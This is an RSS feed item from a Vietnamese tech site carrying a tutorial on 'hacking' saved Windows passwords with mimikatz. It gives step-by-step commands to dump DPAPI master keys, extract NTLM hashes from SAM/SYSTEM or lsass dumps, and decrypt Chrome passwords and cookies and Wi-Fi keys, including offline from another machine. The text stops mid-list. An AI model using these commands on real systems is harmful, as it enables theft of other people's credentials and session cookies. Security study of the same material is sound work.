<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>hack password &#8211; AnonyViet</title>
	<atom:link href="https://anonyviet.com/tag/hack-password/feed/" rel="self" type="application/rss+xml" />
	<link>https://anonyviet.com</link>
	<description>Webiste chia sẻ kiến thức công nghệ thông tin, mạng máy tính, bảo mật phổ biến nhất Việt Nam. Luôn cập nhật tin tức, thủ thuật nóng hổi nhất</description>
	<lastBuildDate>Fri, 25 Jul 2025 01:12:38 +0000</lastBuildDate>
	<language>vi</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://anonyviet.com/wp-content/uploads/2018/10/cropped-ico-logo-75x75.png</url>
	<title>hack password &#8211; AnonyViet</title>
	<link>https://anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA</title>
		<link>https://anonyviet.com/cach-hack-password-windows-da-luu-bang-mimikatz-va-dapa/</link>
					<comments>https://anonyviet.com/cach-hack-password-windows-da-luu-bang-mimikatz-va-dapa/#respond</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Tue, 19 Jan 2021 12:11:34 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[DAPA]]></category>
		<category><![CDATA[hack password]]></category>
		<category><![CDATA[Mimikatz]]></category>
		<category><![CDATA[password]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=23511</guid>

					<description><![CDATA[Trong bài viết &#8220;Cách hack mật khẩu Windows&#8220;, mình đã hướng dẫn các bạn cách hack pass login Windows 10 bằng truy xuất RAM. Còn trong bài viết hôm nay, mình sẽ hướng dẫn các bạn làm quen với chương trình mimikatz 2, chương trình mà mình đã sử dụng để trích xuất mật khẩu [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Trong bài viết &#8220;<a href="https://anonyviet.com/cach-su-dung-powermemory-de-hack-password-login-windows/" target="_blank" rel="noopener noreferrer">Cách hack mật khẩu Windows</a>&#8220;, mình đã hướng dẫn các bạn cách hack pass login Windows 10 bằng truy xuất RAM. Còn trong bài viết hôm nay, mình sẽ hướng dẫn các bạn làm quen với chương trình mimikatz 2, chương trình mà mình đã sử dụng để trích xuất mật khẩu trong hệ thống đang sử dụng hoặc từ các tệp đăng ký Windows từ một máy tính khác.</p>
<h2>Cách Windows lưu trữ mật khẩu</h2>
<p>Ngoài mật khẩu dùng để đăng nhập vào Windows, các mật khẩu dưới đây cũng được lưu trữ trong hệ điều hành này:</p>
<ul>
<li>Credential Manager</li>
<li>Windows Vault</li>
<li>Mật khẩu trình duyệt IE</li>
<li>Mật khẩu Wifi</li>
<li>Certifications</li>
<li>Mật khẩu VPN</li>
<li>SSH keys</li>
<li>Mật khẩu Google Chrome</li>
<li>Chứng chỉ Google Talk, Skype, Dropbox, iCloud, Safari</li>
</ul>
<p>Tất cả các mật khẩu này đều được mã hóa. Để mã hóa mật khẩu và thông tin đăng nhập, hệ thống phải sử dụng DPAPI (Giao diện lập trình ứng dụng bảo vệ dữ liệu). Đối với người dùng cuối, tất cả các quy trình mã hóa và giải mã dữ liệu đều được minh bạch, tức là các nhà phát triển không đụng chạm tới dữ liệu thô của bạn.</p>
<p>Mật khẩu người dùng được sử dụng để mã hóa các dữ liệu này. Chính xác hơn, các master keys (khóa chính) được tạo ra, với sự trợ giúp của dữ liệu được mã hóa và giải mã, và mật khẩu người dùng được sử dụng để giải mã các khóa chính. Một người dùng có thể có nhiều master keys. Trên thực tế, hàm băm sẽ băm tất cả các mật khẩu cũ được lưu trữ và cố gắng giải mã khóa chính cho đến khi tìm thấy mã băm phù hợp.</p>
<p>Yêu cầu bắt buộc của cơ chế giải mã này là bạn phải có khoá chính phù hợp , ví dụ, mật khẩu từ trình duyệt web Google Chrome. Nhưng nếu bạn sao chép tệp chứa mật khẩu của trình duyệt này sang máy tính khác mà không có khóa chính của máy cũ, thì bạn sẽ không thể giải mã các mật khẩu này.</p>
<h2>Cách mã hóa và giải mã bằng DPAPI</h2>
<p>Chúng ta sẽ tiếp tục dùng công cụ <a href="https://github.com/gentilkiwi/mimikatz/releases" target="_blank" rel="noopener">mimikatz</a> để thực nghiệm Hack tất cả Password đã lưu trên Windows.</p>
<p>Như đã đề cập ở trên, DPAPI được sử dụng để mã hóa và giải mã dữ liệu. DPAPI khá đơn giản không chỉ cho người dùng cuối, mà còn cho các nhà phát triển muốn sử dụng cách mã hóa này &#8211; có hai chức năng chính của DPAPI là mã hóa và giải mã, chúng có thể được gọi từ ứng dụng.</p>
<p>Trước khi chuyển sang trích xuất Password từ trình duyệt web và các Password khác được lưu trữ trên Windows, hãy tìm hiểu kỹ hơn về DPAPI. Nhiều bài báo hay đã giải thích cách hoạt động của DPAPI. Vậy nên mình sẽ không giải thích lại nữa, mà chỉ đơn giản là cung cấp các bài viết <a href="https://vi.conservationdatasystems.com/5189-dpapi-secrets.html" target="_blank" rel="noopener">ở đây</a>. Thay vì đi sâu vào chi tiết lý thuyết của DPAPI, chúng ta hãy thực hiện một vài ví dụ thực tế: mã hóa một chuỗi hoặc tệp bằng DPAPI.</p>
<p>Mô-đun <strong>dpapi</strong> được sử dụng để làm việc với DPAPI, lệnh <strong>protect</strong> được sử dụng để mã hóa dữ liệu. Lệnh này có tùy chọn bắt buộc là <strong>/data</strong>, cuối cùng, bạn chỉ cần nhập đường dẫn đến file hoặc văn bản cần mã hoá là được.</p>
<p>Ví dụ: tôi muốn mã hóa chuỗi ‘Test string to encrypt’:</p>
<p><span style="font-size: 14pt;"><code>dpapi::protect /data:<span class="hljs-string">"Test string to encrypt"</span></code></span></p>
<p><img fetchpriority="high" decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/11/129.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA" width="518" height="369" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 13"></p>
<p>Hãy chú ý đến phần “<strong>Blob:</strong>” &#8211; đây là dữ liệu được mã hóa ở dạng nhị phân.</p>
<p>Thay vì hiển thị dữ liệu trên command line, chúng có thể được lưu bằng tùy chọn <strong>/out:</strong></p>
<p><code><span style="font-size: 14pt;">dpapi::protect /data:<span class="hljs-string">"Test string to encrypt"</span> /out:crypted.txt</span></code></p>
<p>Kết quả là, tệp crypted.txt đã được tạo. Tệp này chứa dữ liệu &#8220;Test string to encrypt&#8221; được mã hóa.</p>
<p>Như bạn có thể thấy, chúng ta không cần phải suy nghĩ về khóa chính và mật khẩu &#8211; hệ điều hành sẽ tự làm mọi thứ.</p>
<p>Để giải mã, hàm <strong>blob</strong> được sử dụng (blob là dữ liệu được mã hóa theo phương pháp này) từ cùng một mô-đun <strong>dpapi</strong>. Hàm này có một tùy chọn bắt buộc là<strong> /in</strong>, sau đó bạn cần chỉ định dữ liệu để giải mã. Để giải mã, bạn cũng cần chỉ tuỳ chọn <strong>/unprotect</strong>, nếu không thông tin về <strong>blob</strong> (dữ liệu được mã hóa) sẽ chỉ được hiển thị mà không có giải mã:</p>
<p><code><span style="font-size: 14pt;">dpapi::blob /in:crypted.txt /unprotect</span></code></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/11/130.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 12" width="518" height="219" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 14">Nếu bạn muốn lưu dữ liệu đã giải mã vào một tệp, thì hãy sử dụng tùy chọn <strong>/out.</strong></p>
<h2>Cách giải mã tệp DPAPI trên máy tính khác</h2>
<p>Điều gì xảy ra nếu mình chuyển tệp crypto.txt sang một máy tính khác và cố gắng giải mã nó bằng cùng một lệnh trên? Thử xem nhé:</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/11/131.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 13" width="685" height="347" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 15"></p>
<p>Việc giải mã đã không thành công và xuất hiện lỗi:</p>
<p><code>* <span class="hljs-keyword">using</span> CryptUnprotectData API ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; NTE_BAD_KEY_STATE, needed Masterkey <span class="hljs-keyword">is</span>: {ac45381a-d9db<span class="hljs-number">-4</span>c68-b0e9<span class="hljs-number">-7410667</span>c3984}</code></p>
<p>Nếu bạn để ý kỹ lỗi thì sẽ tìm ra được, thứ chúng ta cần là Masterkey ac45381a-d9db-4c68-b0e9-7410667c3984.</p>
<p>Chuỗi ac45381a-d9db-4c68-b0e9-7410667c398 là mã băm khóa chính. Có thể nói đây là mã định danh hay vân tay của chìa khóa. Trên máy tính ban đầu, nơi dữ liệu đã được mã hóa, việc giải mã chúng rất đơn giản và dễ dàng. Còn khi chúng ta cố gắng giải mã dữ liệu này mà không có khóa chính sẽ không thành công. Vậy nên, thứ chúng ta cần là chỉ định Masterkey từ máy tính ban đầu, cụ thể là máy mà dữ liệu được mã hóa.</p>
<p>Mình đã trích xuất Masterkey và sẽ chỉ định nó bằng cách sử dụng tùy chọn<strong> /masterkey</strong> và chạy lại lệnh giải mã trên máy tính khác:</p>
<p><span style="font-size: 14pt;"><code><span class="hljs-attribute">dpapi</span>::blob /in:crypted.txt /unprotect /masterkey:<span class="hljs-number">5</span>dccd<span class="hljs-number">3</span>bea<span class="hljs-number">06</span>a<span class="hljs-number">52</span>d<span class="hljs-number">4355</span>fa<span class="hljs-number">6</span>b<span class="hljs-number">03421845</span>c<span class="hljs-number">9</span>fe<span class="hljs-number">96277</span>db<span class="hljs-number">0</span>d<span class="hljs-number">5</span>af<span class="hljs-number">1</span>a<span class="hljs-number">24</span>eb<span class="hljs-number">3</span>daefb<span class="hljs-number">14</span>d<span class="hljs-number">6</span>fc<span class="hljs-number">66</span>b<span class="hljs-number">386</span>a<span class="hljs-number">3</span>a<span class="hljs-number">235</span>a<span class="hljs-number">29327</span>d<span class="hljs-number">0</span>dc<span class="hljs-number">1</span>f<span class="hljs-number">7</span>ca<span class="hljs-number">990389644</span>af<span class="hljs-number">173893</span>d<span class="hljs-number">4</span>cf<span class="hljs-number">3392</span>b<span class="hljs-number">3950953</span>dd<span class="hljs-number">8</span></code></span></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/11/132.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 14" width="686" height="389" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 16"></p>
<p>Thành công rồi đó!</p>
<h2>Cách tìm Windows Masterkeys</h2>
<p>Mimikatz có chức năng trích xuất tất cả các master keys của người dùng hiện tại. Nhưng trước khi chuyển sang phần đó, chúng ta phải tìm hiểu các masterkeys để hiểu hết về cách giải mã này nhé.</p>
<p>Ở dạng đã giải mã, ví dụ masterkey trông như thế này: <strong>5dccd3bea06a52d4355fa6b03421845c9fe96277db0d5af1a24eb3daefb14d6fc66b386a3a235a29327d0dc1f7ca990389644af173893d4cf3392b3950953dd8</strong></p>
<p>Các masterkeys được mã hóa và lưu trữ trong một thư mục có dạng <strong>%appdata%\Microsoft\Protect{sid}*. </strong>Giải thích:</p>
<ul>
<li><strong>%appdata%</strong> kà <strong>C:\Users&lt;USER&gt;\AppData\Roaming</strong></li>
<li><strong>{sid}</strong> là user SID</li>
</ul>
<p>Trong CMD (Win + r → gõ cmd), bạn có thể thấy SID của mình bằng lệnh:</p>
<p><span style="font-size: 14pt;"><code>wmic useraccount <span class="hljs-keyword">where</span> name=<span class="hljs-string">"%USERNAME%"</span> <span class="hljs-keyword">get</span> sid</code></span></p>
<p>Lệnh đó sẽ không hoạt động trong PowerShell. Các lệnh sau sẽ hoạt động trong cả CMD và PowerShell.</p>
<p>Tìm SID của bạn:</p>
<p><span style="font-size: 14pt;"><code><span class="hljs-attribute">whoami</span> /user</code></span></p>
<p>Tìm SID cho tất cả các user:</p>
<p><code><span style="font-size: 14pt;">wmic useraccount <span class="hljs-keyword">get</span> name,sid</span></code></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/11/133.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 15" width="459" height="391" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 17"></p>
<p>Các masterkey được mã hoá trên ổ cứng của bạn:</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/11/134.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 16" width="722" height="233" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 18"></p>
<p>Hàm<strong> dpapi::masterkey</strong> có thể giải mã các masterkey. Nếu bạn chỉ sử dụng chức năng này với tùy chọn <strong>/in</strong>, và chỉ định đường dẫn đến masterkey, thì thông tin về nó sẽ được hiển thị mà không cần giải mã:</p>
<p><code><span style="font-size: 14pt;">dpapi::masterkey /in:<span class="hljs-string">"%appdata%\Microsoft\Protect\S-1-5-21-4099021954-1290662600-116018068-1001\ac45381a-d9db-4c68-b0e9-7410667c3984"</span></span></code></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/11/135.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 17" width="517" height="284" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 19"></p>
<p>Để trích xuất tất cả các masterkey của người dùng hiện tại cùng một lúc, hãy chạy lệnh:</p>
<p><code><span style="font-size: 14pt;">sekurlsa::dpapi</span></code></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/11/136.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 18" width="517" height="368" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 20"></p>
<p>Các masterkeys trong này gồm:</p>
<p><code>Authentication Id : <span class="hljs-number">0</span> ; <span class="hljs-number">371163</span> (<span class="hljs-number">00000000</span>:<span class="hljs-number">0005</span>a9db) Session : Interactive <span class="hljs-keyword">from</span> <span class="hljs-number">1</span> User Name : MiAl Domain : HACKWARE-MIAL Logon Server : HACKWARE-MIAL Logon Time : <span class="hljs-number">25.02</span><span class="hljs-number">.2020</span> <span class="hljs-number">13</span>:<span class="hljs-number">25</span>:<span class="hljs-number">54</span> SID : S<span class="hljs-number">-1</span><span class="hljs-number">-5</span><span class="hljs-number">-21</span><span class="hljs-number">-4099021954</span><span class="hljs-number">-1290662600</span><span class="hljs-number">-116018068</span><span class="hljs-number">-1001</span> [<span class="hljs-meta">00000000</span>] * GUID : {abd3abfe-f620<span class="hljs-number">-46e4</span>-a5ee<span class="hljs-number">-8</span>dc314ef4169} * Time : <span class="hljs-number">25.02</span><span class="hljs-number">.2020</span> <span class="hljs-number">18</span>:<span class="hljs-number">34</span>:<span class="hljs-number">11</span> * MasterKey : <span class="hljs-number">450e3</span>e2609e394dfef60c90533a06ddd84dc9968965bd8579a3c40607704077e506c8d0738e6f42cfd934b3eb75eedc3c29fe7deb8dd0cf05ddb4deb653fcbff * sha1(key) : <span class="hljs-number">806</span>d3a6453a45b9b4eb3e8edafc9dd4b12c0d494 [<span class="hljs-meta">00000001</span>] * GUID : {ac45381a-d9db<span class="hljs-number">-4</span>c68-b0e9<span class="hljs-number">-7410667</span>c3984} * Time : <span class="hljs-number">25.02</span><span class="hljs-number">.2020</span> <span class="hljs-number">18</span>:<span class="hljs-number">26</span>:<span class="hljs-number">00</span> * MasterKey : <span class="hljs-number">5</span>dccd3bea06a52d4355fa6b03421845c9fe96277db0d5af1a24eb3daefb14d6fc66b386a3a235a29327d0dc1f7ca990389644af173893d4cf3392b3950953dd8 * sha1(key) : d5a7975eea70b6fe5eae3809ed3c7e9c864d1333</code></p>
<p>GUID là một định danh (identifier), tên của một tệp masterkey. MasterKey chính là khóa chủ.</p>
<p>Để thuận tiện, mimikatz lưu trữ một bộ nhớ cache của các masterkey được giải nén. Và không chỉ lưu trữ và hiển thị chúng, mà còn sử dụng masterkeys nếu cần cho các hoạt động nhất định. Để xem nội dung của bộ nhớ đệm, hãy chạy lệnh:</p>
<p><code><span style="font-size: 14pt;">dpapi::cache</span></code></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/11/137.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 19" width="603" height="228" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 21"></p>
<p>Các masterkeys được giải nén có thể được sử dụng trên máy khác.</p>
<h2>Cách lưu và sử dụng master keys</h2>
<p>Để lưu bộ nhớ cache, hãy sử dụng các tùy chọn <strong>/save</strong> và <strong>/file: FILE</strong>:</p>
<p><span style="font-size: 14pt;"><code>dpapi::<span class="hljs-keyword">cache</span> /<span class="hljs-keyword">save</span>/<span class="hljs-keyword">file</span>:cache.bin</code></span></p>
<p>Nếu bạn sử dụng tuỳ chọn <strong>/file</strong>, thì theo mặc định, dữ liệu sẽ được lưu vào tệp <strong>mimikatz_dpapi_cache.ndr</strong>.</p>
<p>Để load bộ nhớ cache, hãy sử dụng tùy chọn <strong>/load</strong> và <strong>/file: FILE</strong>:</p>
<p><code><span style="font-size: 14pt;">dpapi::<span class="hljs-keyword">cache</span> /<span class="hljs-keyword">load</span> /<span class="hljs-keyword">file</span>:cache.bin</span></code></p>
<h2>CREDHIST</h2>
<p>Tệp này nằm trên đường dẫn <strong>“%appdata%\Microsoft\Protect\CREDHIST”,</strong> chỉ tác dụng trong trường hợp không thuộc domain nào cả. Tệp này:</p>
<ul>
<li>chứa: thông tin đăng nhập được mã hóa trước đó của người dùng (SHA1 &amp; NTLM)</li>
<li>được sử dụng để: giải mã masterkey</li>
<li>được bảo vệ bởi: mật khẩu SHA1 được dùng gần đây nhất</li>
<li>mỗi entry được bảo vệ bởi khóa trước đó, &#8230;..</li>
</ul>
<p>Để xem các thuộc tính của tệp này, hãy chạy lệnh:</p>
<p><span style="font-size: 14pt;"><code>dpapi::credhist /in:<span class="hljs-string">"%appdata%\Microsoft\Protect\CREDHIST"</span></code></span></p>
<p>Ví dụ kết quả:</p>
<p><span style="font-size: 14pt;"><code><span class="hljs-strong">**CREDHIST**</span> dwVersion : 00000001 - 1 </code></span></p>
<p><span style="font-size: 14pt;"><code>guid : {86cddf31-2b68-42fb-a6e6-28b628228fc8} </code></span></p>
<p><span style="font-size: 14pt;"><code>dwNextLen : 00000000 - 0</code></span></p>
<p>Mình đã cố gắng giải mã tệp này trong mimikatz bằng lệnh:</p>
<p><code><span style="font-size: 14pt;"><span class="hljs-attribute">dpapi</span>::credhist /in:<span class="hljs-string">"Z:\files\CREDHIST"</span> <span class="hljs-string">"/password:qweqwe123"</span> /sid:S-<span class="hljs-number">1</span>-<span class="hljs-number">5</span>-<span class="hljs-number">21</span>-<span class="hljs-number">4099021954</span>-<span class="hljs-number">1290662600</span>-<span class="hljs-number">116018068</span>-<span class="hljs-number">1003</span></span></code></p>
<p>nhưng lại không thành công. Nếu bạn biết cách giải mã nó, hãy để lại bình luận nhé.</p>
<h2>Cách trích xuất tất cả mật khẩu của Google Chome</h2>
<p>Trong mimikatz, sử dụng lệnh <strong>dpapi :: chrome</strong>, bạn có thể trích xuất tất cả mật khẩu của người dùng hiện tại. Bạn cần sử dụng tùy chọn <strong>/in</strong> với đường dẫn đến tệp lưu trữ thông tin xác thực. Tệp này nằm trong <strong>“%localappdata%\Google\Chrome\User Data\Default\Login Data”</strong>. Nhân tiện, tệp này thuộc dạng cơ sở dữ liệu SQLite, trong đó tất cả dữ liệu ngoại trừ mật khẩu (ví dụ: địa chỉ của các trang web) được lưu trữ dưới dạng văn bản rõ ràng. Và mật khẩu được mã hóa bằng DPAPI. Để giải mã, chúng ta cần phải sử dụng tuỳ chọn <strong>/unprotect:</strong></p>
<p><span style="font-size: 14pt;"><code>dpapi::chrome /in:<span class="hljs-string">"%localappdata%\Google\Chrome\User Data\Default\Login Data"</span> /unprotect</code></span></p>
<h2>Cách trích xuất tất cả cookie của Google Chome</h2>
<p>Google Chome lưu trữ cookie trong tệp <strong>“%localappdata%\Google\Chrome\User Data\Default\Cookies”</strong>. Như với mật khẩu của trang web, tất cả dữ liệu ngoại trừ cookie sẽ được lưu trữ dưới dạng văn bản rõ ràng. Để truy xuất tất cả thông tin của cookie, hãy chạy lệnh:</p>
<p><code><span style="font-size: 14pt;">dpapi::chrome /in:<span class="hljs-string">"%localappdata%\Google\Chrome\User Data\Default\Cookies"</span> /unprotect</span></code></p>
<h2>Cách trích xuất mật khẩu Wi-Fi của Windows</h2>
<p>Trong Windows, mật khẩu Wi-Fi có thể được trích xuất mà không cần mimikatz, ví dụ:</p>
<p><span style="font-size: 14pt;"><code>netsh wlan export profile <span class="hljs-keyword">interface</span>= <span class="hljs-string">"&lt;INTERFACE NAME&gt;"</span> key=clearfolder=c:\ netsh wlan export profile <span class="hljs-keyword">interface</span>=<span class="hljs-string">"*"</span>key=clearfolder=c:\</code></span></p>
<p>Để phương pháp này hoạt động, bạn phải cắm card Wi-Fi.</p>
<p>Nhược điểm của phương pháp này là nó không hoạt động đối với máy tính đã tắt.</p>
<p>Trong mimikatz có lệnh <strong>dpapi :: wifi</strong> và <strong>dpapi :: wwan</strong> tương ứng để trích xuất mật khẩu từ các kết nối Wi-Fi và WWAN đã lưu.</p>
<p>Mật khẩu Wi-Fi được lưu dưới dạng:</p>
<ul>
<li><strong>C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{interface guid}*.xml</strong></li>
</ul>
<p>Và mật khẩu WWAN được lưu dưới dạng:</p>
<ul>
<li><strong>C:\ProgramData\Microsoft\Wlansvc\Profiles{interface guid}*.xml</strong></li>
</ul>
<p>Bạn cần bắt đầu bằng cách lấy các masterkeys. Vì mình thực hiện các lệnh này trên local, nên mình giải mã các masterkey bằng lệnh:</p>
<p><span style="font-size: 14pt;"><code>sekurlsa::dpapi</code></span></p>
<p>Mình đã tìm thấy trên local hai interfaces, mỗi interfaces có một cấu hình kết nối Wi-Fi:</p>
<ul>
<li>C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{24FF5798-6078-4148-96B5-75191CCEA209}{0C67E040-68A8-42A4-B870-8B5AA5E4823B}.xml</li>
<li>C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{C623DA26-72C0-4DD6-99B1-6E2C2D06E8C5}{A372AA08-55B8-4A66-A349-EAAB48580E0A}.xml</li>
</ul>
<p>Để trích xuất mật khẩu Wi-Fi, mìnhchạy các lệnh:</p>
<p><span style="font-size: 14pt;"><code>dpapi::wifi /in:<span class="hljs-string">"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{24FF5798-6078-4148-96B5-75191CCEA209}\{0C67E040-68A8-42A4-B870-8B5AA5E4823B}.xml"</span></code></span></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/11/138.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 20" width="770" height="422" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 22"></p>
<p>Mật khẩu trong dòng <strong>&#8220;Key Material:&#8221;.</strong></p>
<p><span style="font-size: 14pt;"><code>dpapi::wifi /in:<span class="hljs-string">"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{C623DA26-72C0-4DD6-99B1-6E2C2D06E8C5}\{A372AA08-55B8-4A66-A349-EAAB48580E0A}.xml"</span> /unprotect</code></span></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/11/139.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 21" width="518" height="289" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 23"></p>
<p>Nếu masterkeys không có trong bộ nhớ cache mimikatz, bạn có thể chỉ định rõ ràng nó bằng tùy chọn <strong>/masterkey.</strong></p>
<h2>Cách trích xuất mật khẩu Google Chrome từ một máy tính khác</h2>
<ol>
<li>Để giải mã tệp <strong>“%localappdata%\Google\Chrome\User Data\Default\Login Data”</strong>, bạn cần Masterkey được mã hóa mật khẩu trong tệp này.</li>
<li>Để giải mã masterkeys, bạn cần mật khẩu người dùng Windows để đăng nhập vào hệ thống và tệp masterkeys được mã hóa, tức là tệp <strong>%appdata%\Microsoft\Protect{sid}*.</strong></li>
<li>Để bẻ khóa mật khẩu người dùng Windows, bạn cần có hàm băm NTLM.</li>
<li>Để truy xuất mã băm NTLM, bạn cần các tệp đăng ký (registry files) <strong>C:/Windows/System32/config/SAM </strong>và <strong>C:/Windows/System32/config/SYSTEM</strong>, hoặc kết xuất lsass.DMP. Hơn nữa, tốt hơn là sử dụng kết xuất vì có thể trích xuất hàm băm SHA1 từ nó và hàm băm này có thể được sử dụng trực tiếp để giải mã masterkeys.<br />
<span style="font-size: 14pt;"><code>lsadump::sam /system:C:\path\to\SYSTEM /sam:C:\path\to\SAM</code></span></li>
<li>Sau đó, để lấy Masterkey ngoại tuyến, bạn cần chạy lệnh sau:<br />
<span style="font-size: 14pt;"><code>dpapi::masterkey /in:<span class="hljs-string">"path\to\encrypted\masterkey"</span> <span class="hljs-string">"/password:target_user_password"</span> /sid:target_user_SID</code></span></li>
</ol>
<p>SID có thể được lấy từ tên thư mục đến masterkeys được mã hóa.</p>
<p><span style="font-size: 14pt;"><code><span class="hljs-attribute">dpapi</span>::masterkey /in:<span class="hljs-string">"Z:\files\1f89c852-1c9d-47f9-81f8-b18be7c11512"</span> <span class="hljs-string">"/password:qweqwe123"</span> /sid:S-<span class="hljs-number">1</span>-<span class="hljs-number">5</span>-<span class="hljs-number">21</span>-<span class="hljs-number">4099021954</span>-<span class="hljs-number">1290662600</span>-<span class="hljs-number">116018068</span>-<span class="hljs-number">1003</span></code></span></p>
<p>Nếu thành công, thông tin sau sẽ được hiển thị ở cuối kết quả:</p>
<p><code>[<span class="hljs-meta">masterkey</span>] <span class="hljs-keyword">with</span> <span class="hljs-keyword">volatile</span> cache: SID:S<span class="hljs-number">-1</span><span class="hljs-number">-5</span><span class="hljs-number">-21</span><span class="hljs-number">-4099021954</span><span class="hljs-number">-1290662600</span><span class="hljs-number">-116018068</span><span class="hljs-number">-1003</span>;GUID:{<span class="hljs-number">1b</span>d91e0f<span class="hljs-number">-25f</span>3<span class="hljs-number">-49e9</span>-a370-bc68d1f0d272};MD4:ca76a176340f0291e1cc8ea7277fc571;SHA1:<span class="hljs-number">886</span>d0f341f3c29030ec855334a08e52868c06c69; key : <span class="hljs-number">89e43</span>af0a178c2f1c7311c028dd75e2d2489fc78a3df92808094b1671785d6fd7f107ec562320bcaa8563be759abbf60bf70791107c5240cda2cfddcb003df19 sha1: b73d4d8cbbdafa960e49ca480559a4b530e65f05</code></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/11/140.png" alt="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 22" width="771" height="554" title="Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 24"></p>
<p>Dòng chính bắt đầu bằng <strong>key</strong>&#8211; đây là masterkey được giải mã.</p>
<p>Ngoài ra, masterkeys sẽ được lưu vào bộ nhớ đệm.</p>
<p>Cuối cùng, để giải mã ngoại tuyến mật khẩu trình duyệt Google Chrome, hãy chạy lệnh:</p>
<p><span style="font-size: 14pt;"><code>dpapi::chrome /in:<span class="hljs-string">"PATH\TO\Login Data"</span> /unprotect /masterkey:MASTERKEY</code></span></p>
<p>Nếu masterkey đã có trong bộ nhớ cache, thì bạn có thể bỏ qua tùy chọn <strong>/masterkey.</strong></p>
<h2>Nơi Windows lưu trữ mật khẩu</h2>
<p>Đây là các đường dẫn đến các tệp được mã hóa bằng DPAPI. Nếu bị thiếu cái nào, thì các bạn nhớ bình luận nhé:</p>
<p>Pivot table của tác giả mimikatz (rất khó đọc):</p>
<ul>
<li><a href="https://docs.google.com/spreadsheets/d/e/2PACX-1vQl3etOIPA54Xyt04RZlt2syf4xChXfo2EZHViUoUQc94VZGY5jJwPeQGN66vFBZvgzfRc2dP-SEkk1/pubhtml" target="_blank" rel="noopener noreferrer">File Excel liệt kê nơi lưu Password trong Windows</a></li>
</ul>
<p>Mật khẩu Wi-Fi được lưu trữ trong:</p>
<ul>
<li>C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{interface guid}*.xml</li>
</ul>
<p>Mật khẩu WWAN được lưu trữ trong:</p>
<ul>
<li>C:\ProgramData\Microsoft\Wlansvc\Profiles{interface guid}*.xml Xml</li>
</ul>
<p>Cookies Google Chrome được lưu trữ trong:</p>
<ul>
<li>%localappdata%\Google\Chrome\User Data\Default\Cookies</li>
</ul>
<p>Mật khẩu của website được lưu trữ trong:</p>
<ul>
<li>%localappdata%\Google\Chrome\User Data\Default\Login Data</li>
</ul>
<p><strong>% localappdata%</strong> thường là ‘<strong>C:\Users&lt;USERNAME&gt;\AppData\Local</strong>’.</p>
<p>Các masterkeys đã mã hóa được lưu trữ trong một thư mục có dạng <strong>%appdata%\Microsoft\Protect{sid}*</strong>.</p>
<ul>
